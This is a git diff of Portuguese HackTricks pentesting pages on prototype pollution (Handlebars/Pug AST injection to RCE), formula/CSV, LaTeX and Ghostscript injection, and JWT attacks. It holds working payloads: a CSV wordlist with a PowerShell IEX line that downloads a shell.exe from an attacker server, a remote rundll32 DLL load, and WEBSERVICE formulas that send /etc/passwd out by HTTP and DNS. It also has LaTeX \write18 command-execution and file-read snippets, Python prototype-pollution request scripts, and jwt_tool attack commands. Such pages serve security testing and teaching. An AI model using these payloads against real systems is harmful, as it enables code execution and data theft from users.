const Handlebars = require('handlebars');
@ -410,42 +296,20 @@ Object.prototype.body = [{
}
}];
const source = `Hello {{ msg }}`;
const template = Handlebars.precompile(source);
console.log(eval('(' + template + ')')['main'].toString());
/*
function (container, depth0, helpers, partials, data) {
var stack1, lookupProperty = container.lookupProperty || function (parent, propertyName) {
if (Object.prototype.hasOwnProperty.call(parent, propertyName)) {
return parent[propertyName];
}
return undefined
};
return ((stack1 = (lookupProperty(helpers, "undefined") || (depth0 && lookupProperty(depth0, "undefined")) || container.hooks.helperMissing).call(depth0 != null ? depth0 : (container.nullContext || {}), console.log(process.mainModule.require('child_process').execSync('id').toString()), {
"name": "undefined",
"hash": {},
"data": data,
"loc": {
"start": 0,
"end": 0
}
})) != null ? stack1 : "");
}
*/
```
Como resultado, um ataque pode ser configurado assim. Se você passou pelo parser, especifique uma string que não pode ser atribuída ao valor de NumberLiteral. Mas com o AST injetado processado, podemos inserir qualquer código na função.
O código acima demonstra como um atacante pode injetar código arbitrário em um modelo Handlebars.
**Exemplo**
**Referência Externa**: [Problema relacionado à poluição de protótipos na biblioteca 'flat'](https://github.com/hughsk/flat/issues/105)
[https://github.com/hughsk/flat/issues/105](https://github.com/hughsk/flat/issues/105)
Exemplo de poluição de protótipos em Python:
```python
import requests
TARGET_URL = 'http://p6.is:3000'
TARGET_URL = 'http://10.10.10.10:9090'
# make pollution
requests.post(TARGET_URL + '/vulnerable', json = {
@ -467,13 +331,15 @@ requests.post(TARGET_URL + '/vulnerable', json = {
# execute
requests.get(TARGET_URL)
```
### Pug
#### Vulnerabilidade do Pug
Mais informações em [https://blog.p6.is/AST-Injection/#Pug](https://blog.p6.is/AST-Injection/#Pug)
Assim como o Handlebars, o Pug também pode ser explorado através da poluição de protótipos. Mais informações podem ser encontradas em [Injeção de AST no Pug](https://blog.p6.is/AST-Injection/#Pug).
Exemplo de poluição de protótipos no Pug:
```python
import requests
TARGET_URL = 'http://p6.is:3000'
TARGET_URL = 'http://10.10.10.10:9090'
# make pollution
requests.post(TARGET_URL + '/vulnerable', json = {
@ -486,31 +352,36 @@ requests.post(TARGET_URL + '/vulnerable', json = {
# execute
requests.get(TARGET_URL)
```
## O que posso fazer para prevenir?
### Medidas Preventivas
* Congelar propriedades com Object.freeze (Object.prototype)
* Realizar validação nas entradas JSON de acordo com o esquema da aplicação
* Evitar o uso de funções de mesclagem recursiva de maneira insegura
* Usar objetos sem propriedades de protótipo, como `Object.create(null)`, para evitar afetar a cadeia de protótipos
* Usar `Map` em vez de `Object`
* Atualizar regularmente novos patches para bibliotecas
Para mitigar o risco de poluição de protótipos, considere as seguintes estratégias:
## Referência
1. **Imutabilidade de Objetos**: Utilize `Object.freeze` para tornar `Object.prototype` imutável.
2. **Validação de Entrada**: Valide estritamente as entradas JSON com base no esquema da aplicação.
3. **Funções de Mesclagem Seguras**: Evite o uso inseguro de funções de mesclagem recursiva.
4. **Objetos sem Protótipo**: Use `Object.create(null)` para criar objetos sem propriedades de protótipo.
5. **Uso de Mapa**: Opte por `Map` em vez de `Object` para pares chave-valor.
6. **Atualizações de Biblioteca**: Atualize regularmente as bibliotecas para incorporar patches de segurança.
## Referências
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
* [https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l](https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l)
* [https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
* [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
<details>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

126
pentesting-web/formula-csv-doc-latex-ghostscript-injection.md
View file

@ -1,38 +1,38 @@
# Injeção de Fórmula/CSV/Doc/LaTeX/GhostScript
# Injeção de Fórmulas/CSV/Doc/LaTeX/GhostScript
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao avançado com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Injeção de Fórmula
## Injeção de Fórmulas
### Informações
Se a sua **entrada** está sendo **refletida** dentro de **arquivos CSV** (ou qualquer outro arquivo que provavelmente será aberto pelo **Excel**), você pode ser capaz de inserir **fórmulas** do Excel que serão **executadas** quando o usuário **abrir o arquivo** ou quando o usuário **clicar em algum link** dentro da planilha do Excel.
Se a sua **entrada** está sendo **refletida** dentro de **arquivos CSV** (ou qualquer outro arquivo que provavelmente será aberto pelo **Excel**), você pode ser capaz de inserir **fórmulas do Excel** que serão **executadas** quando o usuário **abrir o arquivo** ou quando o usuário **clicar em algum link** dentro da planilha do Excel.
{% hint style="danger" %}
Atualmente, o **Excel alertará** (várias vezes) o **usuário quando algo for carregado de fora do Excel** para preveni-lo de ações maliciosas. Portanto, um esforço especial em Engenharia Social deve ser aplicado ao payload final.
Atualmente, o **Excel alertará** (várias vezes) o **usuário quando algo é carregado de fora do Excel** para evitar que ele realize ações maliciosas. Portanto, um esforço especial em Engenharia Social deve ser aplicado ao payload final.
{% endhint %}
### [Lista de Palavras](https://github.com/payloadbox/csv-injection-payloads)
### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
@ -41,40 +41,42 @@ DDE ("cmd";"/C calc";"!A0")A0
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### Hyperlink
### Hiperlink
**O exemplo a seguir é muito útil para exfiltrar conteúdo da planilha final do Excel e realizar solicitações para locais arbitrários. No entanto, requer que o usuário clique no link (e aceite os avisos de segurança).**
**O exemplo a seguir é muito útil para exfiltrar conteúdo da planilha final do Excel e para fazer solicitações para locais arbitrários. Mas requer que o usuário clique no link (e aceite os avisos de alerta).**
Exemplo retirado de [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
O exemplo a seguir foi retirado de [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Vamos assumir um cenário de ataque no sistema de Gerenciamento de Registros de Estudantes de uma escola. O aplicativo permite que o professor insira detalhes dos alunos na escola. O atacante obtém acesso ao aplicativo e quer que todos os professores que usam o aplicativo sejam comprometidos. Então, o atacante tenta realizar um ataque de injeção de CSV por meio do aplicativo web.
O atacante precisa roubar detalhes de outros alunos. Então, ele usa a fórmula Hyperlink e a insere ao digitar os detalhes do aluno.
Imagine uma violação de segurança em um sistema de Gerenciamento de Registros de Alunos explorado por meio de um ataque de injeção de CSV. A intenção principal do atacante é comprometer o sistema usado pelos professores para gerenciar detalhes dos alunos. O método envolve o atacante injetando um payload malicioso na aplicação, especificamente inserindo fórmulas prejudiciais em campos destinados aos detalhes dos alunos. O ataque se desenrola da seguinte forma:
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png)
1. **Injeção de Payload Malicioso:**
- O atacante envia um formulário de detalhes do aluno, mas inclui uma fórmula comumente usada em planilhas (por exemplo, `=HYPERLINK("<malicious_link>","Clique aqui")`).
- Essa fórmula é projetada para criar um hiperlink, mas aponta para um servidor malicioso controlado pelo atacante.
Quando o professor exporta o CSV e clica no hyperlink, os dados sensíveis são enviados para o servidor do atacante.
2. **Exportando Dados Comprometidos:**
- Professores, sem saber da comprometimento, usam a funcionalidade da aplicação para exportar os dados para um arquivo CSV.
- O arquivo CSV, quando aberto, ainda contém o payload malicioso. Esse payload aparece como um hiperlink clicável na planilha.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png)
3. **Desencadeando o Ataque:**
- Um professor clica no hiperlink, acreditando ser uma parte legítima dos detalhes do aluno.
- Ao clicar, dados sensíveis (potencialmente incluindo detalhes da planilha ou do computador do professor) são transmitidos para o servidor do atacante.
O arquivo CSV exportado contém um payload malicioso.
4. **Registrando os Dados:**
- O servidor do atacante recebe e registra os dados sensíveis enviados do computador do professor.
- O atacante pode então usar esses dados para vários propósitos maliciosos, comprometendo ainda mais a privacidade e segurança dos alunos e da instituição.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png)
Os detalhes do aluno são registrados no servidor web do atacante.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
### RCE
Para que este exemplo funcione, é **necessário habilitar a seguinte configuração**:\
Arquivo → Opções → Central de Confiabilidade → Configurações da Central de Confiabilidade → Conteúdo Externo → Habilitar Inicialização do Servidor de Troca Dinâmica de Dados\
Para que este exemplo funcione, é **necessário ter habilitada a seguinte configuração**:\
Arquivo → Opções → Centro de Confiança → Configurações do Centro de Confiança → Conteúdo Externo → Habilitar Inicialização do Servidor de Troca Dinâmica de Dados\
ou o uso de uma **versão antiga do Excel**.
A boa notícia é que **este payload é executado automaticamente quando o arquivo é aberto** (se o usuário aceitar os avisos).
É possível executar uma calculadora com o seguinte payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png>)
### Mais
```bash
@ -84,25 +86,25 @@ A boa notícia é que **este payload é executado automaticamente quando o arqui
**LibreOffice Calc**
* Isto lerá a 1ª linha do arquivo local /etc/passwd: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrar: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrar mais de uma linha: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* Isso irá ler a 1ª linha do arquivo local /etc/passwd: `='file:///etc/passwd'#$passwd.A1`
* Exfiltrá-lo: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Exfiltrar mais de uma linha: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* Exfiltração DNS: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analisando o payload de exfiltração DNS:**
**Analisando a carga de exfiltração DNS:**
* file:///etc/passwd#$passwd.A19 Lerá a 19ª linha do arquivo local /etc/passwd
* file:///etc/passwd#$passwd.A19 Irá ler a 19ª linha do arquivo local /etc/passwd
* ENCODEURL(file:///etc/passwd#$passwd.A19) Codifica a URL dos dados retornados
* MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41) Semelhante a substring, lê dados do 1º ao 41º caractere uma maneira muito útil de restringir o comprimento dos hostnames DNS (limite de 254 caracteres em FQDN e 63 caracteres para um rótulo, ou seja, subdomínio)
* MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41) Semelhante a substring, lê dados do 1º caractere ao 41º uma maneira muito útil de restringir o comprimento dos nomes de host DNS (limite de 254 caracteres em FQDN e 63 caracteres para um rótulo, ou seja, subdomínio)
* SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“) substitui todas as instâncias de % (o caractere especial da codificação de URL) por traço isso garante que apenas caracteres DNS válidos sejam usados
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) Concatena a saída do arquivo (após o processamento acima) com o FQDN (para o qual temos acesso ao host que é autoritativo para o domínio)
* WEBSERVICE Fará uma solicitação para este nome DNS inexistente que podemos então analisar os logs (ou executar tcpdump etc.) no servidor de nome DNS autoritativo para o qual temos controle
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) Concatena a saída do arquivo (após o processamento acima ter ocorrido) com o FQDN (para o qual temos acesso ao host que é autoritativo para o domínio)
* WEBSERVICE Fará uma solicitação para este nome de DNS inexistente que podemos então analisar os logs (ou executar tcpdump etc.) no servidor de nomes autoritativo de DNS para o qual temos controle
### Exfiltração de Dados OOB no Google Sheets
### Google Sheets OOB Data Exfiltration
Primeiramente, vamos introduzir algumas das funções mais interessantes.
Primeiramente, vamos apresentar algumas das funções mais interessantes.
**CONCATENATE**: Anexa strings uma à outra.
**CONCATENATE**: Anexa strings umas às outras.
```
=CONCATENATE(A2:E2)
```
@ -122,24 +124,24 @@ Primeiramente, vamos introduzir algumas das funções mais interessantes.
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: Insere uma imagem em uma célula.
**IMAGEM**: Insere uma imagem em uma célula.
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## Injeção LaTeX
## Injeção de LaTeX
Geralmente, os servidores que você encontrará na internet que **convertem código LaTeX em PDF** usam **`pdflatex`**.\
Este programa utiliza 3 principais atributos para (des)permitir a execução de comandos:
Normalmente, os servidores que encontramos na internet que **convertem código LaTeX para PDF** usam o **`pdflatex`**.\
Este programa utiliza 3 atributos principais para permitir ou não a execução de comandos:
* **`--no-shell-escape`**: **Desabilita** a construção `\write18{command}`, mesmo que esteja habilitada no arquivo texmf.cnf.
* **`--shell-restricted`**: Igual a `--shell-escape`, mas **limitado** a um conjunto 'seguro' de **comandos pré-definidos** (\*\*No Ubuntu 16.04 a lista está em `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Habilita** a construção `\write18{command}`. O comando pode ser qualquer comando do shell. Esta construção normalmente é proibida por razões de segurança.
* **`--no-shell-escape`**: **Desabilita** o construto `\write18{comando}`, mesmo que esteja habilitado no arquivo texmf.cnf.
* **`--shell-restricted`**: Igual a `--shell-escape`, mas **limitado** a um conjunto 'seguro' de \*\*comandos pré-definidos (\*\*No Ubuntu 16.04, a lista está em `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Habilita** o construto `\write18{comando}`. O comando pode ser qualquer comando de shell. Esse construto é normalmente desativado por motivos de segurança.
No entanto, existem outras maneiras de executar comandos, então para evitar RCE é muito importante usar `--shell-restricted`.
### Ler arquivo <a href="#read-file" id="read-file"></a>
Você pode precisar ajustar a injeção com invólucros como \[ ou $.
Você pode precisar ajustar a injeção com wrappers como \[ ou $.
```bash
\input{/etc/passwd}
\include{password} # load .tex file
@ -147,7 +149,7 @@ Você pode precisar ajustar a injeção com invólucros como \[ ou $.
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### Ler arquivo de linha única
#### Ler arquivo de uma única linha
```bash
\newread\file
\openin\file=/etc/issue
@ -155,7 +157,7 @@ Você pode precisar ajustar a injeção com invólucros como \[ ou $.
\text{\line}
\closein\file
```
#### Ler arquivo de múltiplas linhas
#### Ler arquivo de várias linhas
```bash
\newread\file
\openin\file=/etc/passwd
@ -172,9 +174,9 @@ Você pode precisar ajustar a injeção com invólucros como \[ ou $.
\write\outfile{Hello-world}
\closeout\outfile
```
### Execução de comando <a href="#command-execution" id="command-execution"></a>
### Execução de comando <a href="#execução-de-comando" id="execução-de-comando"></a>
A entrada do comando será redirecionada para stdin, use um arquivo temporário para obtê-la.
A entrada do comando será redirecionada para stdin, use um arquivo temporário para obtê-lo.
```bash
\immediate\write18{env > output}
\input{output}
@ -197,7 +199,7 @@ A entrada do comando será redirecionada para stdin, use um arquivo temporário
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
Se você receber algum erro de LaTex, considere usar base64 para obter o resultado sem caracteres ruins.
Se você receber algum erro LaTex, considere usar base64 para obter o resultado sem caracteres inválidos
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
@ -214,7 +216,7 @@ De [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## Injeção Ghostscript
## Injeção de Ghostscript
TODO: Criar um resumo com as informações e técnicas mais relevantes de [https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)
@ -227,20 +229,20 @@ TODO: Criar um resumo com as informações e técnicas mais relevantes de [https
<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, desde APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

189
pentesting-web/hacking-jwt-json-web-tokens.md
View file

@ -1,66 +1,68 @@
# Vulnerabilidades JWT (Json Web Tokens)
# Vulnerabilidades do JWT (Json Web Tokens)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
![](<../.gitbook/assets/image (638) (3).png>)
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100,000**!
**Dica de recompensa por bugs**: **inscreva-se** no **Intigriti**, uma plataforma de **recompensas por bugs premium criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100.000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
**Parte deste post foi retirada de:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
**Autor da excelente ferramenta para pentest de JWTs** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
**Parte deste post é baseada no incrível post:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
**Autor da ótima ferramenta para pentest de JWTs** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
### **Vitórias Rápidas**
### **Ganhos Rápidos**
Execute [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) com o modo `All Tests!` e aguarde pelas linhas verdes
Execute o [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) com o modo `All Tests!` e aguarde as linhas verdes
```bash
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"
```
Se você tiver sorte, a ferramenta encontrará algum caso em que a aplicação web está verificando incorretamente o JWT:
Se tiver sorte, a ferramenta encontrará algum caso em que a aplicação web esteja verificando incorretamente o JWT:
![](<../.gitbook/assets/image (435).png>)
Então, você pode procurar a requisição no seu proxy ou despejar o JWT usado para essa requisição usando jwt_tool:
Em seguida, você pode pesquisar a solicitação em seu proxy ou extrair o JWT usado para essa solicitação usando a ferramenta jwt\_:
```bash
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
```
### Alterar dados sem modificar nada
### Manipular dados sem modificar nada
Você pode simplesmente alterar os dados deixando a assinatura como está e verificar se o servidor está verificando a assinatura. Tente mudar seu nome de usuário para "admin", por exemplo.
Você pode simplesmente manipular os dados deixando a assinatura como está e verificar se o servidor está verificando a assinatura. Tente alterar seu nome de usuário para "admin", por exemplo.
#### **O token está sendo verificado?**
* Se ocorrer uma mensagem de erro, a assinatura está sendo verificada - leia qualquer informação de erro detalhada que possa vazar algo sensível.
* Se a página retornada for diferente, a assinatura está sendo verificada.
* Se a página for a mesma, então a assinatura não está sendo verificada - hora de começar a alterar as reivindicações do Payload para ver o que você pode fazer!
